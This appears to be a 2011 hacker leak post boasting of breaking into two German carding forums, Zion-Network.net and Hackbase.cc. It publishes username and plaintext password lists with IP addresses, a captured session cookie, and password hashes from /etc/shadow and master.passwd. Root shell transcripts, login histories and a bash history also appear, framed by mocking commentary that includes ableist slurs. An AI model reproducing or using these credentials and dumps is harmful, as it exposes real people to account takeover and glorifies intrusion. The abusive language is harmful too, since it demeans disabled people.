sys32:wowanda85:119.42.144.18:20.10.2011 11:26:54 txto:123456:188.98.215.91:18.10.2011 22:26:54 voodoo:allianz3:91.62.186.36:19.10.2011 20:05:36 wacked:ynWgX0HT:84.140.226.167:18.10.2011 18:51:35 whiti:matrix123:84.169.182.65:19.10.2011 22:25:21 xGh0sT:oberbaer1:77.178.33.108:18.10.2011 20:48:23 zero334:uc4ever:213.163.64.43:19.10.2011 13:31:24 zocker:qwertzui:77.178.217.145:20.10.2011 14:44:07 zulu:Pod88ucC2011:80.152.154.125:20.10.2011 06:17:27 ,;~;, /\_ ( / (() //) | \\ ,,;;'\ __ _( )m=((((((((((((((====={ Zion-Network.net }======------- /' ' '()/~' '.(, | ,;( )|| | ~ Zion-Network.net was not so easy to hack. It ,;' \ /-(.;, ) took about ten minutes longer because they were ) / ) / running some reverse http proxy, so we clueless- // || ly got root on that one first, just to find out )_\ )_\ that we did not own the right box. We allow you to laugh at us now. Anyway Zion-Network has been breeding kiddies and carder blockheads for quite a while and it has long been rumored that we already backdoored them a long time ago. But sorry, no, we had other business, too, for example consuming alcohol as if there is no tomorrow. Maybe that's why we failed with that reverse proxy. Nevertheless it was about damn time to own them. The members of Zion-Network are a lot dumber than the other average carding offscum, hardly surprising that they rip off each other to the utmost. Zion-Network has been growing immensely so you can not only buy credit cards or ID card scans on Zion-Network's trading area, but also all sorts of drugs like coke, lsd, mushrooms or crystal. A rather large drug scene has emerged that fulfills everybody's wishes. Great shit for the average 14 year old scammer who sees himself as the greatest but is not able to tie up his own shoes without tripping over himself. Pride and ignorance are akin. And this fact is clearly described by the administration of Zion. LUCIFER aka S3TH, the current administrator announces the following after they applied some innovations to the community. ____________________________________________________________________ | __ __ | | .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | | | _ | | | _ || _| -__|| _ | _ |_ _| | | |__ |_____|_____||____|_____||_____|_____|__.__| | |________|__|________________________________________________________| | | | LUCIFER: Bereiche wie Security & Hacking sowie Coding wurden dabei | | besonders berücksichtigt, damit Fraud nicht mehr | | dominiert, sondern sich mit NonFraud ungefähr die Waage | | hält. | | | |____________________________________________________________________| LUCIFER alleges that they particularly considered security, hacking and coding categories while redesigning the messageboard so that there'd be a balanced ratio of fraud and non fraud on the forums. That is some heavily retarded noble endeavor of trying to bring fraud and HACKING on the same level. We diagnose Down's syndrome or some other mental disability as he clearly fails to acknowledge that there is not even the slightest connection between fraud and hacking. ____________________________________________________________________ | __ __ | | .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | | | _ | | | _ || _| -__|| _ | _ |_ _| | | |__ |_____|_____||____|_____||_____|_____|__.__| | |________|__|________________________________________________________| | | | LUCIFER: Die Hacker-Szene wird immer falsch dargestellt, das ist | | nichts neues. Gesteigerte Gefahr für Zion sehe ich | | dadurch nicht, wir sind sowieso schon das groesste | | deutschsprachige Szene-Board und haben allein deswegen | | schon seit geraumer Zeit juristische Aufmerksamkeit. | | | |____________________________________________________________________| We are really asking ourselves what this guy understands by the term "Hacking-Scene". It's time to teach them a lesson in order to make them see their own "Hacking-Scene" shatter to thousand stinking pieces. Since the rest of the team also shows a great deal of stupidity, that it is not even possible to show a minimal amount of mercy. We do not want to waste time discussing that here, you better have a look at their database backups. Oh by the way, we heard that some of you guys are interested in our ninja techniques of breaking in without being noticed. So today we will give you a 0day tutorial about how to hax a server behind a reverse http proxy (means you need access to the proxy): # nc -vl 80 Now wait.... GET /board/showthread.php?t=37267 HTTP/1.1 Host: zion-network.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Connection: keep-alive Referer: http://zion-network.net/board/forum.php Cookie: bb_lastvisit=1313843209; bb_lastactivity=0; bb_userid=758; bb_password=cbb1acdccd3eefbe2f3adcf4242aa561; vbulletin_collapse=c_thanks_post194596%0Ac_thanks_post196652%0Ac_thanks_post199529; IDstack=lSuObiA%3D; bb_sessionhash=39f517118ecb0ba168105281205e0a59; bb_np_notices_displayed=6; bb_thread_lastview=751d55ed819e2ad0067fbca46f48afd1ccdfededa-16-%7Bi-35252_i-1317570965_i-34784_i-1317564637_i-37212_i-1317563932_i-37236_i-1317563385_i-37200_i-1317559780_i-37227_i-1317557248_i-37177_i-1317549825_i-37217_i-1317548469_i-37211_i-1317546730_i-37180_i-1317537132_i-37184_i-1317517400_i-36756_i-1317514332_i-35132_i-1317466004_i-37190_i-1317511102_i-36548_i-1317463629_i-36054_i-1317581261_%7D; sitechrx=a5f531169bad3dcf2c7789c566346005 ^C # DONE! Of course we don't need to rely on such methods, we simply do something like this: |\ .(' *) ' .................... | \ ' .*) .'* $ ./getroot zion-network.net |(*\ .*(// .*) .# id ...................... |___\ // (. '*.# uid=0(root)... ((("'\ // ' * .......... ((c'7') /\) ,. . ., ((((^)) / \ ,. ,, .-')))(((-' / , (((()) __/' )))( | (() )) It's black magic ... can you smell the fume? ... # uname -a Linux u204 2.6.32-5-amd64 #1 SMP Sun Sep 25 16:21:44 UTC 2011 x86_64 GNU/Linux # cat /etc/issue Debian GNU/Linux 6.0 \n \l # id uid=0(root) gid=0(root) groups=0(root) # cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh Debian-exim:x:101:103::/var/spool/exim4:/bin/false statd:x:102:65534::/var/lib/nfs:/bin/false sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin user:x:1000:1000:user,,,:/home/user:/bin/bash mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false ntp:x:105:107::/home/ntp:/bin/false messagebus:x:106:108::/var/run/dbus:/bin/false dfg435345fgu03:x:1001:1001:,,,:/home/dfg435345fgu03:/bin/bash # cat /etc/shadow root:$6$k1ECC7.L$tYZOWc8NqRaq/RGds7SIVu3IYI/oxd5IVvS1cYlR7S/kK0CrtC1o7howFMQS5gNe3FyPkXLZVA9yiyKy7LRV51:15248:0:99999:7::: daemon:*:15248:0:99999:7::: bin:*:15248:0:99999:7::: sys:*:15248:0:99999:7::: sync:*:15248:0:99999:7::: games:*:15248:0:99999:7::: man:*:15248:0:99999:7::: lp:*:15248:0:99999:7::: mail:*:15248:0:99999:7::: news:*:15248:0:99999:7::: uucp:*:15248:0:99999:7::: proxy:*:15248:0:99999:7::: www-data:*:15248:0:99999:7::: backup:*:15248:0:99999:7::: list:*:15248:0:99999:7::: irc:*:15248:0:99999:7::: gnats:*:15248:0:99999:7::: nobody:*:15248:0:99999:7::: libuuid:!:15248:0:99999:7::: Debian-exim:!:15248:0:99999:7::: statd:*:15248:0:99999:7::: sshd:*:15248:0:99999:7::: user:$6$/0FK/.iX$k9qkCt7AzvwIYu1yN/ofroZCzmivenSDgPzTFnPY36XeAqcF4a6vUyFSbCMAHqz61L5roXdK1nWBn.wcE89U5/:15248:0:99999:7::: mysql:!:15248:0:99999:7::: ntp:*:15248:0:99999:7::: messagebus:*:15248:0:99999:7::: dfg435345fgu03:$6$vMjSRgiC$iY1hSMMP3mHyCqRyEGtqfqTuDFyPwtdVvn/0zZXsu8B2mJMwAURxmZjtkF9xgmSO02alaVBlme.NrW1gTS5cl1:15248:0:99999:7::: # last root pts/0 host-static-93-1 Thu Oct 13 03:48 gone - no logout root pts/0 178.122.33.104 Wed Oct 12 03:58 - 03:48 (23:50) root pts/0 83.246.185.93 Tue Oct 4 22:47 - 03:58 (7+05:11) root pts/0 83.246.185.93 Tue Oct 4 22:46 - 22:47 (00:01) root pts/0 83.246.185.93 Tue Oct 4 22:44 - 22:46 (00:01) root pts/0 83.246.185.93 Tue Oct 4 22:43 - 22:44 (00:00) root pts/0 83.246.185.93 Tue Oct 4 22:38 - 22:43 (00:04) root pts/0 83.246.185.93 Tue Oct 4 22:37 - 22:38 (00:01) root pts/0 85.121.52.21 Tue Oct 4 22:20 - 22:37 (00:16) root pts/0 178.124.12.137 Tue Oct 4 22:14 - 22:20 (00:06) root pts/0 188.24.19.198 Tue Oct 4 20:19 - 22:14 (01:55) root pts/0 188.24.19.198 Tue Oct 4 20:16 - 20:19 (00:02) root pts/1 80.242.104.93 Sun Oct 2 17:55 gone - no logout root pts/1 80.242.104.93 Sun Oct 2 17:43 - 17:55 (00:11) root pts/3 79.112.62.66 Sun Oct 2 16:11 gone - no logout root pts/0 80.242.104.93 Sun Oct 2 14:50 - 20:16 (2+05:25) # alias ls="ls -la" # ls total 64 drwx------ 3 root root 4096 Oct 2 14:12 . drwxr-xr-x 22 root root 4096 Oct 1 09:23 .. drwx------ 2 root root 4096 Oct 1 09:23 .aptitude -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc -rw-r--r-- 1 root root 140 Nov 19 2007 .profile -rwxrwxrwx 1 root root 41394 Oct 1 17:16 mysqltuner.pl # cd /home # ls total 16 drwxr-xr-x 4 root root 4096 Oct 1 18:32 . drwxr-xr-x 22 root root 4096 Oct 1 09:23 .. drwxr-xr-x 2 dfg435345fgu03 dfg435345fgu03 4096 Oct 2 14:20 dfg435345fgu03 drwxr-xr-x 2 user user 4096 Oct 1 09:24 user # cd dfg435345fgu03 # ls total 20 drwxr-xr-x 2 dfg435345fgu03 dfg435345fgu03 4096 Oct 2 14:20 . drwxr-xr-x 4 root root 4096 Oct 1 18:32 .. -rw-r--r-- 1 dfg435345fgu03 dfg435345fgu03 220 Oct 1 18:32 .bash_logout -rw-r--r-- 1 dfg435345fgu03 dfg435345fgu03 3184 Oct 1 18:32 .bashrc -rw-r--r-- 1 dfg435345fgu03 dfg435345fgu03 675 Oct 1 18:32 .profile # cd .. # cd user # ls total 20 drwxr-xr-x 2 user user 4096 Oct 1 09:24 . drwxr-xr-x 4 root root 4096 Oct 1 18:32 .. -rw-r--r-- 1 user user 220 Oct 1 09:24 .bash_logout -rw-r--r-- 1 user user 3184 Oct 1 09:24 .bashrc -rw-r--r-- 1 user user 675 Oct 1 09:24 .profile # Nothing to see here :(^C # cd /var/www # ls total 20 drwxr-xr-x 3 www-data www-data 4096 Oct 1 18:49 . drwxr-xr-x 16 root root 4096 Oct 2 14:37 .. drwxr-xr-x 17 root root 4096 Oct 2 14:25 board -rw-r--r-- 1 root root 111 Oct 2 05:54 index.php -rw-r--r-- 1 root root 1200 Oct 2 04:29 robots.txt # cd board # ls -la total 2604 drwxr-xr-x 17 root root 4096 Oct 2 14:25 . drwxr-xr-x 3 www-data www-data 4096 Oct 1 18:49 .. -rw-r--r-- 1 root root 12292 May 17 2010 .DS_Store -rw-r--r-- 1 root root 70 May 17 2010 ._.DS_Store -rw-r--r-- 1 root root 19541 Sep 24 11:16 LICENSE -rw-r--r-- 1 root root 44905 Sep 24 11:16 ajax.php -rw-r--r-- 1 root root 75977 Sep 24 11:16 album.php -rw-r--r-- 1 root root 19375 Sep 24 11:16 announcement.php -rw-r--r-- 1 root root 4269 Sep 24 11:16 api.php -rw-r--r-- 1 root root 3862 Sep 24 11:16 apichain.php drwxr-xr-x 2 root root 4096 Oct 1 15:06 archive -rw-r--r-- 1 root root 8745 Sep 24 11:16 asset.php -rw-r--r-- 1 root root 20438 Sep 24 11:16 assetmanage.php -rw-r--r-- 1 root root 15831 Sep 24 11:16 attachment.php -rw-r--r-- 1 root root 6690 Sep 24 11:16 attachment_inlinemod.php -rw-r--r-- 1 root root 1960 Sep 25 10:03 banlist.php -rw-r--r-- 1 root root 3657 Sep 24 11:16 blog_attachment.php -rw-r--r-- 1 root root 96572 Sep 24 11:16 calendar.php -rw-r--r-- 1 root root 3336 Sep 24 11:16 ckeditor.php -rw-r--r-- 1 root root 43 Sep 24 11:16 clear.gif drwxr-xr-x 11 root root 4096 Oct 1 15:09 clientscript -rw-r--r-- 1 root root 15382 Sep 24 11:16 converse.php drwxr-xr-x 7 root root 4096 Oct 1 15:09 cpstyles -rw-r--r-- 1 root root 3263 Sep 24 11:16 cron.php -rw-r--r-- 1 root root 6206 Sep 24 11:16 css.php drwxrwxrwx 3 root root 36864 Oct 2 10:09 customavatars drwxr-xr-x 3 root root 4096 Oct 1 15:09 customgroupicons drwxrwxrwx 2 root root 20480 Oct 2 07:58 customprofilepics -rw-r--r-- 1 root root 1739 Sep 24 11:16 editor.php -rw-r--r-- 1 root root 47262 Sep 24 11:16 editpost.php -rw-r--r-- 1 root root 1355 Sep 24 11:16 entry.php -rw-r--r-- 1 root root 30313 Sep 24 11:16 external.php -rw-r--r-- 1 root root 9920 Sep 24 11:16 faq.php -rw-r--r-- 1 root root 10134 Sep 24 11:16 favicon.ico -rw-r--r-- 1 root root 22480 Sep 24 11:16 forum.php -rw-r--r-- 1 root root 43139 Sep 24 11:16 forumdisplay.php -rw-r--r-- 1 root root 2025 Sep 24 11:16 global.php -rw-r--r-- 1 root root 152626 Sep 24 11:16 group.php -rw-r--r-- 1 root root 26181 Sep 24 11:16 group_inlinemod.php -rw-r--r-- 1 root root 11362 Sep 24 11:16 groupsubscription.php -rw-r--r-- 1 root root 9016 Sep 24 11:16 image.php drwxr-xr-x 26 root root 4096 Oct 1 15:10 images drwxr-xr-x 9 root root 12288 Oct 1 19:34 includes -rw-r--r-- 1 root root 114 Oct 2 05:57 index.php -rw-r--r-- 1 root root 47257 Sep 24 11:16 infraction.php -rw-r--r-- 1 root root 187319 Sep 24 11:17 inlinemod.php -rw-r--r-- 1 root root 6831 May 14 02:43 itrader.php -rw-r--r-- 1 root root 15395 Aug 25 15:30 itrader_detail.php -rw-r--r-- 1 root root 12933 Aug 25 14:14 itrader_feedback.php -rw-r--r-- 1 root root 1405 Apr 21 03:45 itrader_global.php -rw-r--r-- 1 root root 23116 Aug 25 17:15 itrader_main.php -rw-r--r-- 1 root root 3970 Apr 21 03:45 itrader_report.php -rw-r--r-- 1 root root 1779 Aug 6 06:47 jabber.php -rw-r--r-- 1 root root 11697 Sep 24 11:16 joinrequests.php -rw-r--r-- 1 root root 1675 Sep 24 11:17 list.php -rw-r--r-- 1 root root 11055 Sep 24 11:17 login.php -rw-r--r-- 1 root root 30872 Sep 24 11:17 member.php -rw-r--r-- 1 root root 16346 Sep 24 11:17 member_inlinemod.php -rw-r--r-- 1 root root 40089 Sep 24 11:17 memberlist.php drwxr-xr-x 6 root root 4096 Oct 1 15:10 mgc_cb_evo -rw-r--r-- 1 root root 60012 May 17 2010 mgc_cb_evo.php -rw-r--r-- 1 root root 49969 Sep 25 13:43 mgc_cb_evo_ajax.php -rw-r--r-- 1 root root 22218 Sep 24 11:17 misc.php -rw-r--r-- 1 root root 5866 Sep 24 11:17 mobile.php -rw-r--r-- 1 root root 76344 Sep 24 11:17 moderation.php -rw-r--r-- 1 root root 6733 Sep 24 11:17 moderator.php -rw-r--r-- 1 root root 17516 Sep 24 11:17 newattachment.php -rw-r--r-- 1 root root 41424 Sep 24 11:17 newreply.php -rw-r--r-- 1 root root 20622 Sep 24 11:17 newthread.php -rw-r--r-- 1 root root 21562 Sep 24 11:17 online.php drwxr-xr-x 7 root root 4096 Oct 1 15:10 packages -rw-r--r-- 1 root root 8526 Sep 24 11:17 payment_gateway.php -rw-r--r-- 1 root root 13314 Sep 24 11:17 payments.php -rw-r--r-- 1 root root 4016 Sep 24 11:17 picture.php -rw-r--r-- 1 root root 16619 Sep 24 11:17 picture_inlinemod.php -rw-r--r-- 1 root root 26550 Sep 24 11:17 picturecomment.php -rw-r--r-- 1 root root 29311 Sep 24 11:17 poll.php -rw-r--r-- 1 root root 10318 Sep 24 11:17 posthistory.php -rw-r--r-- 1 root root 76497 Sep 24 11:17 postings.php -rw-r--r-- 1 root root 7037 Sep 24 11:17 printthread.php -rw-r--r-- 1 root root 81357 Sep 24 11:17 private.php -rw-r--r-- 1 root root 163788 Sep 24 11:17 profile.php -rw-r--r-- 1 root root 56552 Sep 24 11:17 register.php -rw-r--r-- 1 root root 7248 Sep 24 11:17 report.php -rw-r--r-- 1 root root 14719 Sep 24 11:17 reputation.php -rw-r--r-- 1 root root 127 Sep 26 02:58 rules.php -rw-r--r-- 1 root root 35091 Sep 24 11:17 search.php -rw-r--r-- 1 root root 22872 Sep 24 11:17 sendmessage.php -rw-r--r-- 1 root root 12879 Sep 24 11:17 showgroups.php -rw-r--r-- 1 root root 12806 Sep 24 11:17 showpost.php -rw-r--r-- 1 root root 82207 Sep 24 11:17 showthread.php drwxrwxrwx 2 root root 4096 Oct 1 17:57 signaturepics drwxr-xr-x 2 root root 4096 Oct 1 15:10 store_sitemap -rw-r--r-- 1 root root 39241 Sep 24 11:17 subscription.php -rw-r--r-- 1 root root 5353 Sep 24 11:17 tags.php -rw-r--r-- 1 root root 8754 Sep 24 11:17 threadrate.php -rw-r--r-- 1 root root 11104 Sep 24 11:17 threadtag.php -rw-r--r-- 1 root root 61 Sep 24 11:17 uploadprogress.gif -rw-r--r-- 1 root root 39671 Sep 24 11:17 usercp.php -rw-r--r-- 1 root root 21703 Sep 24 11:17 usernote.php drwxr-xr-x 13 root root 4096 Oct 1 15:10 vb -rw-r--r-- 1 root root 28505 Sep 24 11:17 visitormessage.php -rw-r--r-- 1 root root 126 Jul 10 18:23 vv.php -rw-r--r-- 1 root root 1679 Sep 24 11:17 widget.php -rw-r--r-- 1 root root 3801 Sep 24 11:17 xmlsitemap.php drwxr-xr-x 3 root root 4096 Oct 1 15:06 xxxoinbe843bSIUf4igfn49ugnsdkmngwei9fu drwxr-xr-x 2 root root 4096 Oct 1 15:10 zzzsf84bfsadifubSIDFUB48bf # head -n75 includes/config.php elax:jessica emdre:lunartec1 fair_playa77:J6Dm8hFhJ6Dm8hFh fakedMe:eileen13 fakerboy:frankycrew12345 fallout:wazzzappsp3 flon203:flon@Nex glow:amolacar1994+#!Asdf hades:hi1337 hakan123:hakan heisenb6rg:3e2w1q homouus:lolfisch homouus:lolfische iks:noji987 jannizzz:lol123 johnlopez:948nF)§(J03kd09j3 kaye:kaye1234 knell:novn7L8n krillewurm:manfred2711 krono§:1337return1337 kryptôn:123456789ss lasdas:123456 leonard:wj0oU3QJr7pgZ lolboter:lila123 lowbird:3mksu92k=DAK"=)213s lucifer:3.fv!G,$7Ft/;zx,5§Y$Gh"f4tv!D§$3a%0Gy(hXH misanthrop:vju4S4KSthdUD miss.marpel:m4NnrxfZ6QbbyhZc mividaloca:jmZ5rjSkjl#7Qm23+::SmqW.cY}U8c mr. CC:Ficken1337 mr.montana:46samira46 muti:fuckthatshitinass22 n1312:JKjd(()&%hf%&g837gdf neocrow:6/4=)6$§61%)6/=1/ nighter:Six6Pack ooops:ichkommauskielderstadtammeer241985 paco:13xqextraordinary37 paulpanzer:159159159 pelikan:B3v8aZPS phen:utecpnkq6512429myaccount! prosto:16471647 ps24h:Q!ä?-sK2%8AcfÜ2.=% purplera1n:rg5hg54gh45hg r4nd0m:fuckyou1 rabbit:nSRXQm3G rad0n:12345 reQ:Mesum3565me35650108e711lol romulus:v678rheberhbeg sani:19n4schk4tz385 sips:5hgedhtbdh slic3menic3:DkWLjh8G snoppy0066:pueppyi1AA sqli~hoe:ArZt1994 st3aLth:1337!Aa td4s:1qaz2wsx th3p0is0n:th3p0is0nrules1337 till7:peter123 tivja:fabuge28 trixx:makemoney! unnex:selfmode3 vendor84453:15zocker15 veryanonym:wasnhierlosman1991 vittula:oddset06 wacked2:klfGKDfksdmfoc5§io wastl:wastl24 xK1NG:xhu12101995xier xTonyStylesx:pol1pol2 z4pz4r4p:AzzarackAttack zionnoob:123456 ,;~;, _/\ \ ) (\\ ()) /';;,, // | -------========{ Hackbase.cc }========))))))))))))))=m( )_ __ | ,(.' '~/()' ' '\ We can't say much here because we would start ~ | ||( );, repeating ourselves. But anyway, on Hackbase.cc ( ,;.)-\ / ';, the banner says "Hacking, Carding & more". Don't \ ( \ ( ask why we owned them; the community and that || \\ banner begged for it. By now you know our moti- /_( /_( vation, you know our goals, deal with it. But there is something else which was a thorn in our side. It seems that Easy Laster aka ea former admin of Free-Hack (after we owned them), hosts his 4004-Security-Project on Hackbase's server. 4004-security-project.com was a blog on that Easy constantly posts horribly lame exploits for all kind of webapps that nobody uses while thinking that by publishing all this bullshit he'd actually help people. Actually it's a known fact that he sucks all kinds of cock for vulnerabilities to put on exploit-db, just check it out: exploit-db.com/author/?a=2201. It's hilarious and more than obvious that he is one of those kids that try to inject a ' into every parameter on a website. Here is what you get. # uname -a FreeBSD FreeBSD 8.2-RELEASE-p3 #0: Fri Sep 30 16:23:24 MSD 2011 amd64 # id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) # cat /etc/passwd # $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin webserver:*:1000:1000:User &:/home/webserver:/sbin/nologin secunet:*:1002:1002:User &:/home/secunet:/sbin/nologin testsite:*:1003:1003:User &:/home/testsite:/sbin/nologin 224422:*:1004:1004:User &:/home/224422:/sbin/nologin testserver:*:1005:1005:User &:/home/testserver:/sbin/nologin union:*:1006:1006:User &:/home/union:/sbin/nologin hbstream:*:1001:1001:User &:/home/hbstream:/sbin/nologin # cat /etc/master.passwd # $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $ # root:$1$cyeIuWcS$dKdflWuxgGARl2fSKU8gt1:0:0::0:0:Charlie &:/root:/bin/csh toor:*:0:0::0:0:Bourne-again Superuser:/root: daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5::0:0:System &:/:/usr/sbin/nologin bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin postfix:*:125:125::0:0:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin webserver:$1$aJvdDZwW$s0ArlD0j8Mp7.TNNWHfb61:1000:1000::0:0:User &:/home/webserver:/sbin/nologin secunet:$1$1rSKOEED$t2rUxxCrpjM2dEOLj60hn1:1002:1002::0:0:User &:/home/secunet:/sbin/nologin testsite:$1$UbUABgoI$YtxsunrUQShX8SvMzc9Q61:1003:1003::0:0:User &:/home/testsite:/sbin/nologin 224422:$1$wnqKSLwS$6oJKVhnALXFO40nUQerrd0:1004:1004::0:0:User &:/home/224422:/sbin/nologin testserver:$1$a8H.A2qA$XmH5GlVXWwXDbZOsdexeU.:1005:1005::0:0:User &:/home/testserver:/sbin/nologin union:$1$UwJ9q.lU$kMqN2S5JqT/fLPgzlIAGO/:1006:1006::0:0:User &:/home/union:/sbin/nologin hbstream:$1$MVeAfs8T$Fp2/xBRF0jIyT4DZIvqIf.:1001:1001::0:0:User &:/home/hbstream:/sbin/nologin # pwd /root # ls -la total 6292 drwxr-xr-x 4 root wheel 512 Sep 29 09:07 . drwxr-xr-x 18 root wheel 512 Jul 1 01:53 .. -rw------- 1 root wheel 10971 Oct 4 14:44 .bash_history -rw-r--r-- 1 root wheel 798 Jan 18 2010 .cshrc -rw------- 1 root wheel 5249 Sep 30 21:55 .history -rw-r--r-- 1 root wheel 155 Jan 18 2010 .k5login -rw------- 1 root wheel 71 Jul 5 15:47 .lesshst -rw-r--r-- 1 root wheel 303 Jan 18 2010 .login drwx------ 3 root wheel 512 Sep 29 09:07 .mc -rw------- 1 root wheel 18 Jul 21 17:26 .mysql_history -rw-r--r-- 1 root wheel 265 Jan 18 2010 .profile drwx------ 2 root wheel 512 Mar 10 2010 .ssh -rw-r--r-- 1 root wheel 0 Jul 5 15:46 ec1902 -rw-r--r-- 1 root wheel 168 Feb 1 2010 example.php -rw-r--r-- 1 root wheel 476 Sep 2 06:37 forsirius.conf -rw-r--r-- 1 root wheel 3150763 Feb 21 2011 ioncube_loaders_fre_8_x86-64.tar.gz # cat .bash_history make install clean cd /usr/ports/devel/ZendOptimizer/ make install clean mc -d cd /usr/ports/ search name=eaccelerator make search name=eaccelerator cd /usr/ports/www/eaccelerator make install clean mkdir /tmp/eaccelerator chown www /tmp/eaccelerator chmod 0700 /tmp/eaccelerator mc -d cd /usr/ports/ make search name=ioncube cd /usr/ports/devel/ioncube make install clean mc -d cd /usr/ports/lang/php52-extensions/ make install clean pkg_version -vIL= php -v php -m php -v php -m history php -v mc php -v php -v mc php -m mc mc pkg_info|grep ioncube pkg_info|grep php mc -d ifconfig apachectl start mc -d fetch http://downloads2.ioncube.com/loader_downloads/ioncube_loaders_fre_8_x86-64.tar.gz php loader-wizard.php rm loader-wizard.php cd /usr/ports/devel/ioncube/ make clean make /usr/local/etc/rc.d/nginx start mcedit -d /etc/rc.conf /usr/local/etc/rc.d/nginx start ifconfig apachectl restart ps ax|grep apache ps ax|grep http apachectl start ps ax|grep http cat /var/log/httpd/httpd_error.log cat /var/log/httpd/httpd_error.log apachectl start ps ax|grep http apachectl stop apachectl start php -v cd / php -v php -v /usr/local/etc/rc.d/nginx stop /usr/local/etc/rc.d/apache22 restart exit edit /etc/rc.conf exit ps ax cd /home/ ls -l cd webserver/ ls -l ls -l mc sockstat -l4 vi /etc/rc.conf jls mc apachectl restart tail -n 100 /var/log/httpd/httpd_access.log tail -n 100 /var/log/httpd/httpd_error.log mc tail -n 100 /var/log/httpd/httpd_error.log mc tail -n 100 /var/log/httpd/httpd_error.log ls -la /home ls -la /home/webserver/ ls -la /home/webserver/free-hack.in/ ls -la /home/webserver/free-hack.in/msd1/ chmod -R 755 /home/webserver/ exit mcedit /etc/my.cnf /usr/local/etc/rc.d/mysql-server restart exit mc /usr/local/etc/rc.d/mysql-server restart mcedit /usr/local/etc/php.ini apachectl restart php -m php -v exit passwd exit passwd tail -f /var/log/httpd/httpd_access.log top ps ax | grpe http | wc -l ps ax | grep http | wc -l tail -f /var/log/httpd/httpd_access.log top mysql -uroot -p`cat /etc/my.passwd ` uname -a mailq postsuper -D ALL postsuper -d ALL mailq 